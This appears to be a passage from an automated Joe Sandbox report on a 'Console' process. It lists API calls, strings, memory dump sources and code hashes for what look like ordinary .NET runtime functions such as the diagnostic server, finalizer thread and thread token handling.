                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c960151dda449cdb9f6e5e2b2741c740ca1f7d953f356fc553560365953e95de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA18AB96081025BEB64EB689C95BBA3BA6F775200B55095EF7C1CF3E4D7328808C751

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 012D71F6
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 012D7210
                                                                                                                                                                                                                            • Part of subcall function 01252910: ReadFile.KERNEL32(?,?,?,00000000,00000004,?,00000000,?,00000000,?,012D727D,00000014,?), ref: 0125292F
                                                                                                                                                                                                                            • Part of subcall function 01252910: GetLastError.KERNEL32(?,00000000,?,00000000,?,012D727D,00000014,?), ref: 0125293E
                                                                                                                                                                                                                            • Part of subcall function 01252910: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001,?,00000000,?,00000000,?,012D727D,00000014,?), ref: 01252955
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000014,?), ref: 012D7314
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DOTNET_IPC_V1,00000014,?), ref: 012D72F7
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000014,?), ref: 012D733E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 012D7494
                                                                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,00000000), ref: 012D749D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D74AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DOTNET_IPC_V1, xrefs: 012D72F1
                                                                                                                                                                                                                          • .NET EventPipe, xrefs: 012D7204
                                                                                                                                                                                                                          • DiagnosticServer - received IPC message with command set (%d) and command id (%d), xrefs: 012D7385
                                                                                                                                                                                                                          • Received unknown request type (%d), xrefs: 012D7515, 012D756B
                                                                                                                                                                                                                          • Diagnostics IPC listener was undefined, xrefs: 012D7599
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$FileThread$AllocateBuffersCurrentDescriptionErrorFlushLastOverlappedProcessReadResultstrcmp
                                                                                                                                                                                                                          • String ID: .NET EventPipe$DOTNET_IPC_V1$DiagnosticServer - received IPC message with command set (%d) and command id (%d)$Diagnostics IPC listener was undefined$Received unknown request type (%d)
                                                                                                                                                                                                                          • API String ID: 1528069343-1097641503
                                                                                                                                                                                                                          • Opcode ID: 1b1ae089613ca7555446856c254775a57a60da3593bfb636bd23441f7158f0d9
                                                                                                                                                                                                                          • Instruction ID: 52b1e947607755450165e4f03b984cc62b283c98cbd19edd9ac0435db0941c33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b1ae089613ca7555446856c254775a57a60da3593bfb636bd23441f7158f0d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A1F271628282ABD3209B28EC45B7FBBE9FFA4705F40451DFE8597294EB78C910C752

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0108596C
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0108597D
                                                                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 01085984
                                                                                                                                                                                                                          • RevertToSelf.ADVAPI32 ref: 0108598E
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 010859BB
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000000), ref: 010859C5
                                                                                                                                                                                                                          • SetThreadToken.ADVAPI32(00000000,FFFFFFFF), ref: 010859F6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 01085A42
                                                                                                                                                                                                                          • _controlfp_s.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000300), ref: 01085A71
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 01085A12
                                                                                                                                                                                                                          • SetupThread managed Thread %p Thread Id = %x, xrefs: 01085945
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$Current$HandleToken$CloseDuplicateOpenProcessRevertSelf_controlfp_s
                                                                                                                                                                                                                          • String ID: SetupThread managed Thread %p Thread Id = %x$UndoRevert/SetThreadToken failed for hToken = %d
                                                                                                                                                                                                                          • API String ID: 2317356610-1638468778
                                                                                                                                                                                                                          • Opcode ID: 4b10eefd5892d1b6d611e574c2bf3a5fcbe8d66271cc4fb9dfc5134d7ae485f7
                                                                                                                                                                                                                          • Instruction ID: 1e31371f0b8833742df73fc7df8ab9536ce2d86c26d2eef1675f1bbf28b705b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b10eefd5892d1b6d611e574c2bf3a5fcbe8d66271cc4fb9dfc5134d7ae485f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551D671604305AFE760AF69DC85BABBBE9EF04B11F10026DEA95E22D0EB749500C761

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D6020: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                            • Part of subcall function 012D6020: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • CoCreateGuid.COMBASE(0164A210,00000000,?,00000000,?,?,00000000), ref: 012D7651
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7711
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,?,?), ref: 012D773B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7747
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7763
                                                                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?), ref: 012D77AB
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,?,?), ref: 012D77BA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • At least one Diagnostic Port failed to be configured., xrefs: 012D7675
                                                                                                                                                                                                                          • Failed to create diagnostic server thread (%d)., xrefs: 012D7835
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$DisconnectNamedPipe$BuffersCreateFileFlushGuidfreemalloc
                                                                                                                                                                                                                          • String ID: At least one Diagnostic Port failed to be configured.$Failed to create diagnostic server thread (%d).
                                                                                                                                                                                                                          • API String ID: 3534690289-1000282211

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoUninitialize.OLE32(7CAB6A82,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 0108940A
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010894A0
                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 010894F4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentInitializeThreadUninitialize
                                                                                                                                                                                                                          • String ID: MTA$Platform not supported: Windows 7 is the minimum supported version$STA
                                                                                                                                                                                                                          • API String ID: 3738326507-2542953770

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC,.cctor lock), ref: 01054F55
                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0105578F
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,.cctor lock), ref: 0105518A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC), ref: 01055255
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC,?,00000003,00000000,0000003C,00000000), ref: 0105538A
                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0105551D
                                                                                                                                                                                                                            • Part of subcall function 00FC1A30: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B34A5,000000FF,?,0122CEBC), ref: 00FC1A73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DoRunClassInit: Request to init %pT in appdomain %p, xrefs: 01054E8A
                                                                                                                                                                                                                          • .cctor lock, xrefs: 01054EFB
                                                                                                                                                                                                                          • DoRunClassInit: returning SUCCESS for init %pT in appdomain %p, xrefs: 01055236
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Concurrency::details::_Lock::_ReaderScoped_lockScoped_lock::~_Writer$EnterFreeHeap
                                                                                                                                                                                                                          • String ID: .cctor lock$DoRunClassInit: Request to init %pT in appdomain %p$DoRunClassInit: returning SUCCESS for init %pT in appdomain %p

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8C85
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CA6
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CCB
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CF3
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D19
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D39
                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000000,03C71B78,03C05978), ref: 014A8D57
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(00000001,0122E9F5,0000001C,00000000,03C71B78,03C05978), ref: 014A8D87
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000001), ref: 014A8DB1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem$FileView$QueryVirtual
                                                                                                                                                                                                                          • String ID:

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateMemoryResourceNotification.KERNEL32(00000000,7CAB6A82,00000000,?,00000000,014D1C74,000000FF,?,01418B82,?,?,?,?,?,?,00000000), ref: 010DAA96
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 010DAAE8
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 010DAB48
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 010DABA8
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000264,00000000,010DA9A0,00000000,.NET Finalizer), ref: 010DAC2F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$Event$Heap$AllocateMemoryNotificationProcessResourceResumeThread
                                                                                                                                                                                                                          • String ID: .NET Finalizer$ResumeThread

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0108621C
                                                                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 01086223
                                                                                                                                                                                                                          • RevertToSelf.ADVAPI32 ref: 0108622D
                                                                                                                                                                                                                          • SetThreadToken.ADVAPI32(00000000,000000FF,00000000,00000000,00000001), ref: 0108628D
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 010862F2
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 01086309
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 010862A9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$Token$CloseCurrentDescriptionHandleOpenRevertSelf
                                                                                                                                                                                                                          • String ID: UndoRevert/SetThreadToken failed for hToken = %d
                                                                                                                                                                                                                          • API String ID: 1971310446-1701864498
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00FD2FB0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD3013
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD30DE
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD3163
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD3242
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD3333
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD336B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$FreeHeap$Enter
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 707808192-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 012500C5
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0125015B
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000020C,000000FF), ref: 01250186
                                                                                                                                                                                                                            • Part of subcall function 01236720: LeaveCriticalSection.KERNEL32(03C17714,?,03C176F0,0124FE08), ref: 01236731
                                                                                                                                                                                                                            • Part of subcall function 01236720: SleepEx.KERNEL32(000000FF,00000000,0124FE08), ref: 01236779
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$CriticalCurrentDescriptionLeaveObjectSectionSingleSleepWait
                                                                                                                                                                                                                          • String ID: .NET Debugger$Debugger Thread spinning up
                                                                                                                                                                                                                          • API String ID: 3582553491-698254634
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4AA
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4CB
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE4EF
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE513
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE537
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FDE55B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 32694325-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000001,00000000,000000FF,?,?), ref: 00FF3F5E
                                                                                                                                                                                                                          • strncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000001,0159D848,000000FF), ref: 00FF3F83
                                                                                                                                                                                                                          • strncat_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,00000001,000000FF,?,?), ref: 00FF3FA4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • NotSupported_CollectibleBoundNonCollectible, xrefs: 00FF42D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncat_s$strncpy_s
                                                                                                                                                                                                                          • String ID: NotSupported_CollectibleBoundNonCollectible
                                                                                                                                                                                                                          • API String ID: 2411846981-3079447967
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,00000000,00000000,?,014662C9,?,00000000), ref: 01478382
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,FFFFFFFE,?,014662C9,?,00000000), ref: 01478394
                                                                                                                                                                                                                          • DecodePointer.KERNEL32(00003F34,?,014662C9,?,00000000), ref: 014783A1
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(014662C9,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014783C3
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014783CD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DecodePointer$Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 631176825-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 01084589
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • T::ST - recycling thread 0x%p (state: 0x%x), xrefs: 010845FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                                                          • String ID: T::ST - recycling thread 0x%p (state: 0x%x)
                                                                                                                                                                                                                          • API String ID: 2882836952-1329013172
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647A28,7CAB6A82,03C16310,00000000,?,014C2691,000000FF,?,00FC3126,01647570,01647CF0,00000000), ref: 01047974
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647C9C,?,00FC3126,01647570,01647CF0,00000000), ref: 01047998
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647C64,?,00FC3126,01647570,01647CF0,00000000), ref: 010479BC
                                                                                                                                                                                                                            • Part of subcall function 0122E910: LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0163EAD0,?,?,00008000,015066C0,00000002,00000000,010695A0,00000018), ref: 01047D3C
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01506574,00003000,00001000,00000000,?,03C1B230,00000001,?,00000000,00000000,?,?,?,?,?), ref: 01047B69
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                            • Part of subcall function 00FDC860: HeapFree.KERNEL32(00000000,00000000,03C0B7C0,00000000,01506564,01506474,?,?,01047D33,?,?,00008000,015066C0,00000002,00000000,010695A0), ref: 00FDC94E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Heap$Leave$AllocateEnterFreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3617692385-0
                                                                                                                                                                                                                          • Opcode ID: f2c7a6ccc181490e9a963c485aafd184d10ad8a6b4625fc0a91508a7bd0aaaef
                                                                                                                                                                                                                          • Instruction ID: 34f1bb1099702fed61eada0465488efbc91f88dd88e6d440ca3e817464796458
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c7a6ccc181490e9a963c485aafd184d10ad8a6b4625fc0a91508a7bd0aaaef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DE1AEB1A007059FEB20DF68C885BDABBF4EF44704F1441B9ED49AF285D7B56908CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 00FC6279
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000004,00000009,?), ref: 00FC63A0
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000009,?), ref: 00FC63F1
                                                                                                                                                                                                                            • Part of subcall function 0115DFB0: SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                            • Part of subcall function 0115DBC0: GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ErrorEventLast
                                                                                                                                                                                                                          • String ID: File load lock
                                                                                                                                                                                                                          • API String ID: 3394562845-3356667065
                                                                                                                                                                                                                          • Opcode ID: db15a210d23f266dc865d74678442aee355f61fab1a556d54da66c66cb37cd6b
                                                                                                                                                                                                                          • Instruction ID: 44de5082d0f3da23a4b794b72ab9ce8c27af6f5bec5942c38d67a95133221e09
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db15a210d23f266dc865d74678442aee355f61fab1a556d54da66c66cb37cd6b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00026A70D0824ACFDF24CFA8CA45BAEBBB0AF18314F14809DE845AB391D7759D45DB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(-00000004,?), ref: 00FD1B6B
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FD1B8F
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 00FD1BB3
                                                                                                                                                                                                                            • Part of subcall function 00FCCEF0: LeaveCriticalSection.KERNEL32(03C5C530,?,7CAB6A82,0CB3F4BC,CEA1900B,?), ref: 00FCCF74
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RefEmit_InMemoryManifestModule, xrefs: 00FD1C7F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Initialize$Leave
                                                                                                                                                                                                                          • String ID: RefEmit_InMemoryManifestModule
                                                                                                                                                                                                                          • API String ID: 664292470-2496751632
                                                                                                                                                                                                                          • Opcode ID: dac28a05fdd9bc205dbc9b7de12a66670d8fe84814229ee218639d74b7111f73
                                                                                                                                                                                                                          • Instruction ID: 1a570dde4682a7662976eac76a051596d1da45226dbfedf3385d9a2d58ee5ec8
